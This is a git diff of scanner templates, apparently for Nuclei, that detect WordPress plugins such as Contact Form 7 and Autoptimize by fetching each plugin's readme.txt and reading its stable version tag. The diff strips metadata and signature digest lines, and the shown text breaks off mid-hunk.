c0656fb030..41e297ffeb 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/ metadata: - max-request: 1 plugin_namespace: all-in-one-wp-security-and-firewall wpscan: https://wpscan.com/plugin/all-in-one-wp-security-and-firewall tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/all-in-one-wp-security-and-firewall/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100d89d9b884fa3363e1255bb5a730370ae14441d582e066a82396460c02ad27591022100c304f8fe304f08dbde827709d1d88d6f1764d93e1c6c41865ad8937226bf9d0f:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index 2252137c2f..0dd8686ec3 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/amp/ metadata: - max-request: 1 plugin_namespace: amp wpscan: https://wpscan.com/plugin/amp tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/amp/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a004630440220593fa0c7fe0cfc5dbcf3fb3c9ab3bc75f2a15af124dc3ecd3deaaee5f5cc92a6022041e5465b0abe223cc53279f2b55e5832cd372e852693154862bcc8576b03d9be:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index 97c26650f5..359671f3bd 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/antispam-bee/ metadata: - max-request: 1 plugin_namespace: antispam-bee wpscan: https://wpscan.com/plugin/antispam-bee tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/antispam-bee/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402204bc5b27be6b0903384324e5a970a0db24ef69e924de1ef878c5ec22706f12d4802204b5aed2eebc44a4f5e038adbae76ec6dd075131da637f8428804d81e00877bf3:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index 002910bfba..116e0c420a 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/astra-sites/ metadata: - max-request: 1 plugin_namespace: astra-sites wpscan: https://wpscan.com/plugin/astra-sites tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/astra-sites/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022037f54c843878d5bad3cb88fa38bca8e905c1ca0b8c4485472279e3738af5dc8e022100b6a3f73e7333ac3b17cca7c12d26a95c07084b37e773a5d1947684452f0c2cab:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/astra-widgets.yaml b/http/technologies/wordpress/plugins/astra-widgets.yaml index ef1e817cd3..dc4703ef8d 100644 --- a/http/technologies/wordpress/plugins/astra-widgets.yaml +++ b/http/technologies/wordpress/plugins/astra-widgets.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/astra-widgets/ metadata: - max-request: 1 plugin_namespace: astra-widgets wpscan: https://wpscan.com/plugin/astra-widgets tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/astra-widgets/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100b8054101c96284d4621150f90ff42365bf415eeaaa7c7ff019e2828f686f6cef02200e70021defc50a5c4549d89bfb0cdd894483db31f1413bf5aee1a1bef0a47227:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index b94826c685..1426ac3ef2 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/autoptimize/ metadata: - max-request: 1 plugin_namespace: autoptimize wpscan: https://wpscan.com/plugin/autoptimize tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/autoptimize/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402200990d29dd8779869568b2acc6c72c44a1a0a56e6685444c899b084865b62748a0220224151a7361810bd9e4a137ad4f3b821ceacb963b218377c9284df83a93ec516:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index 199caadc40..78d1651ff4 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/backwpup/ metadata: - max-request: 1 plugin_namespace: backwpup wpscan: https://wpscan.com/plugin/backwpup tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/backwpup/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100b920bee3090f876d3ab128f35c56aacf42be4349d842a5ab754dc88713c53b34022071295fb51f29c5412ef919ad81b4e75de62d0dc0c0e0a1fc034b00ab9d4e5e4b:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index 5ede345324..f7219b373d 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/better-search-replace/ metadata: - max-request: 1 plugin_namespace: better-search-replace wpscan: https://wpscan.com/plugin/better-search-replace tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/better-search-replace/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100cca55b52b5a0c13846f3f08ebdf1fa4009ae551fd3e33e1469e274a6f26142e6022100f43d4f1366a645f045e1deb5a9f92c51c31fff561dbc45ce60d1da14e1699659:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index 3079f2952e..d1e01c329b 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/better-wp-security/ metadata: - max-request: 1 plugin_namespace: better-wp-security wpscan: https://wpscan.com/plugin/better-wp-security tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/better-wp-security/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100d32a15ee90d1e3d276b927d10e24c0759c1dde93db9080e39b6f140d3c78bd32022100f92423dd7b70caefc6d24b2cc6574bca15097aa2b845daa4931f1610bbf1c620:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index 84adeb008d..00e95c4263 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/black-studio-tinymce-widget/ metadata: - max-request: 1 plugin_namespace: black-studio-tinymce-widget wpscan: https://wpscan.com/plugin/black-studio-tinymce-widget tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/black-studio-tinymce-widget/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100e084ca17407f45da76dddb4379923ea47cd83cd4b68a8dd785b6d2eee11d4b15022100ae8a7f6179b21268683f7690342ed45cf1f9581b77ac7c8a610500ce84ff43d3:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index 316853ebd1..212b2b13c4 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/breadcrumb-navxt/ metadata: - max-request: 1 plugin_namespace: breadcrumb-navxt wpscan: https://wpscan.com/plugin/breadcrumb-navxt tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/breadcrumb-navxt/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502200901e5776ac2dcdeb2672d8f2b01dd14bf57613fd2a3472dd40f5f3a4aa627ce0221008fb3f03123d4ae95ab9ef7b5cb37b3dbc14b851c3b8ff4c606103a5b835504b3:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index 44d1eb3bb9..6318392c5c 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/breeze/ metadata: - max-request: 1 plugin_namespace: breeze wpscan: https://wpscan.com/plugin/breeze tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/breeze/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402201e6e574f0340f06b51cfbf342bdb97d2b66dea2c6e40607e671988a2adaac30902201e6e64c57c1b9e9ea56c86840c4f3d2e6dd2a5180976408d38020081b3a49416:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index 83ceea9309..e1a2a186e0 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/broken-link-checker/ metadata: - max-request: 1 plugin_namespace: broken-link-checker wpscan: https://wpscan.com/plugin/broken-link-checker tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/broken-link-checker/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100bc69c6d8660ccf856d448f34f423ef6812ad7b88bfa010cabad5f673851348df022100c7d123e08cf0bb783a4cd421a3338d5834903cb80fb4010488eb2b3ec93e2c48:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index 4b5998e67e..23614882a7 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/child-theme-configurator/ metadata: - max-request: 1 plugin_namespace: child-theme-configurator wpscan: https://wpscan.com/plugin/child-theme-configurator tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/child-theme-configurator/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a004630440220650b1d9972c1836277d6550239645ac0ab75f34ac1ad436972d5db705411e8b5022050085f645718175e8f2c619dd94199b0d70656c3705caa16d5cb0c485e71818f:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index 3b7cbb3ed5..85965337cb 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/classic-editor/ metadata: - max-request: 1 plugin_namespace: classic-editor wpscan: https://wpscan.com/plugin/classic-editor tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/classic-editor/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402200d8d160a2902646b0be01060d7b81b7f082ccdabf84dd52c69f874cf0e89b163022069c240b0484a4091aa1a82456c1001ac1dcea8bd8833ef007477cba00e91c732:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index d07b4a2c52..33d903a1b4 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/classic-widgets/ metadata: - max-request: 1 plugin_namespace: classic-widgets wpscan: https://wpscan.com/plugin/classic-widgets tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/classic-widgets/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a00463044022069b6a6c6723cb78dedffe2e757b3ae69787d391c3232b5c348df2ef4f9bb6c2102206064370a51198c045269b178ac111591cc2b8de3910daf3212dbfa5e062c5fb3:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 470a664946..3c6f8f287b 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/click-to-chat-for-whatsapp/ metadata: - max-request: 1 plugin_namespace: click-to-chat-for-whatsapp wpscan: https://wpscan.com/plugin/click-to-chat-for-whatsapp tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/click-to-chat-for-whatsapp/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022072d38e534e6a47b5ddaecf127c308d758addc9f8057f128df3d3d97b52da26f0022100acc2254cef9d96875f9039c340408c9f832dc335a449d3fa707138b7520b2938:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index bba9a8e0f6..c3b630cde2 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/cmb2/ metadata: - max-request: 1 plugin_namespace: cmb2 wpscan: https://wpscan.com/plugin/cmb2 tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/cmb2/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a004630440220379faaeade5c65d15404ed4b9d40938379fcec38f4299f9cfd1bd60dff3b186d022041c32bb18835a4bdc9e002f563a4af33320cd3f562d1f39f172db2c7b1736827:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index e10ab10d26..5c8ce709b6 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/coblocks/ metadata: - max-request: 1 plugin_namespace: coblocks wpscan: https://wpscan.com/plugin/coblocks tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/coblocks/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a00463044022100f455aa25b40cbf75e5acd1be0c98f4bfb2519b39a19c1762b9e348e8a6076fcc021f70eadfe5e05fb659e4bc548044606ba2cae6a6bcad9512a4edf1b7174da483:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index 7a5cedd5ab..aea47b9e84 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/code-snippets/ metadata: - max-request: 1 plugin_namespace: code-snippets wpscan: https://wpscan.com/plugin/code-snippets tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/code-snippets/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402207af499e6131035bb21854f95419b5028a661cd1d247e6656b13ffa06f1086e25022047eb16a5f2902f78ce0487018fc0ebdf1cdd7c0e5ef3caeec2775642cad0f161:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index b71809ba3b..78c584c388 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/coming-soon/ metadata: - max-request: 1 plugin_namespace: coming-soon wpscan: https://wpscan.com/plugin/coming-soon tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/coming-soon/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100e38cc3ad7b223cb432e5eb77881f5e94cf72c7155a3104f396469639b30a70bb0220271115f4ba44c23ffa256cfae16fdb5f8f7882672a5650fc0b37bab1cda331c1:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index 323c215d57..2c80d09c27 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/complianz-gdpr/ metadata: - max-request: 1 plugin_namespace: complianz-gdpr wpscan: https://wpscan.com/plugin/complianz-gdpr tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/complianz-gdpr/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a004830460221008acb9d01ac71f71612124720e3066905560a1992dc3e954f833e8826ebf8d836022100ce0231b41beb6dd019d71299371d37821bb507b21839f5833fbc45ac7726b498:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index d09a12b221..4b1b3a8754 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/contact-form-7-honeypot/ metadata: - max-request: 1 plugin_namespace: contact-form-7-honeypot wpscan: https://wpscan.com/plugin/contact-form-7-honeypot tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/contact-form-7-honeypot/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022028ca053ea47da13ef22800d8b5d86963d7d7537e0effbab866a2c6d013dbff70022100e60020517f55d0dd169405c84b8bb6565f9f8bffce3b1265d43bec529c2e4b05:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index 971bf59e8d..06ad83bdf7 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/contact-form-7/ metadata: - max-request: 1 plugin_namespace: contact-form-7 wpscan: https://wpscan.com/plugin/contact-form-7 tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/contact-form-7/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a004730450220435c04436a9323082c59c30390240b225fb05e378749725a5a8cd987b2e59212022100cca245234344111aa28cfed2b9911df0b7540ed711ffecc57d3161a49bb8bc34:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index dd9a63f923..b20666268f 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/contact-form-cfdb7/ metadata: - max-request: 1 plugin_namespace: contact-form-cfdb7 wpscan: https://wpscan.com/plugin/contact-form-cfdb7 tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/contact-form-cfdb7/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402206c46699844706f7afb9e8c2b9b54c629f1be388fcbc7dc2d632127cd3f32cb62022026a4df55a31ad8530f3461fa92e0495882324e0da1639db75d0b6c9de6208983:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index 1215369aa2..b2a097bfe7 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/cookie-law-info/ metadata: - max-request: 1 plugin_namespace: cookie-law-info wpscan: https://wpscan.com/plugin/cookie-law-info tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/cookie-law-info/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100e7696b8cc54ed85ecf9c1d6b5e87f88edad9d547f022316c6a72cd4d01db67fb02206de52953851966f20a814e324fafe052c0f7d1276388ad3446ce4d0a2b6989e1:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index ba025b5baf..c71fa258af 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/cookie-notice/ metadata: - max-request: 1 plugin_namespace: cookie-notice wpscan: https://wpscan.com/plugin/cookie-notice tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/cookie-notice/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100f096b3130fb82cb3ff8d51ca3e1ef0771351681fd2708a7da7c4ab7dcf5caf2f0220511aaeddb98020b8bf7c4674344de778688a0d53d7e30e3b0af667a8c3721383:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index 8c0259b7da..5a98e67597 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/creame-whatsapp-me/ metadata: - max-request: 1 plugin_namespace: creame-whatsapp-me wpscan: https://wpscan.com/plugin/creame-whatsapp-me tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/creame-whatsapp-me/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100e74d1b25af790f65757bb572e308c2f2629dcf2a7e487b922d5dc023128b12bd022100c935b72bb5898c339a5f8604a3c00a4ff64c0653ab7f680073a6f56a8087966e:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index 807a23e45d..4463174203 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/creative-mail-by-constant-contact/ metadata: - max-request: 1 plugin_namespace: creative-mail-by-constant-contact wpscan: https://wpscan.com/plugin/creative-mail-by-constant-contact tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/creative-mail-by-constant-contact/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a004630440220511e827ca8c7667f0c186495873a99e2d05c3bd13d18dc205d61d93bd329998c0220372337e2a22d8dd881b9e6f7f50ec51349afe090d3c7dee8ee5208e122b66aa4:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index 4cf1aed8bc..cfac0b961b 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/custom-css-js/ metadata: - max-request: 1 plugin_namespace: custom-css-js wpscan: https://wpscan.com/plugin/custom-css-js tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/custom-css-js/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100aa4e5c16b83b1794974fb1c163f683f2b90b721478ef15202f0d96eeb10b91ca0221009e7bbef4e090a20523c859715214bab9a079b176665566714f8080da15eb70aa:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index ca1b4470e3..846761f2f7 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/custom-fonts/ metadata: - max-request: 1 plugin_namespace: custom-fonts wpscan: https://wpscan.com/plugin/custom-fonts tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/custom-fonts/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402200a9fcab159677c9d68d3b086d6cdc904ab7b8cd6eef4cbcd941a999111e7ed7002202891c3a9b8367f01617f4915e979b5c607e0ad32ba108048f95cc398416b7de0:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index a20e7b1229..0def6e61ca 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/custom-post-type-ui/ metadata: - max-request: 1 plugin_namespace: custom-post-type-ui wpscan: https://wpscan.com/plugin/custom-post-type-ui tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/custom-post-type-ui/readme.txt" @@ -47,5 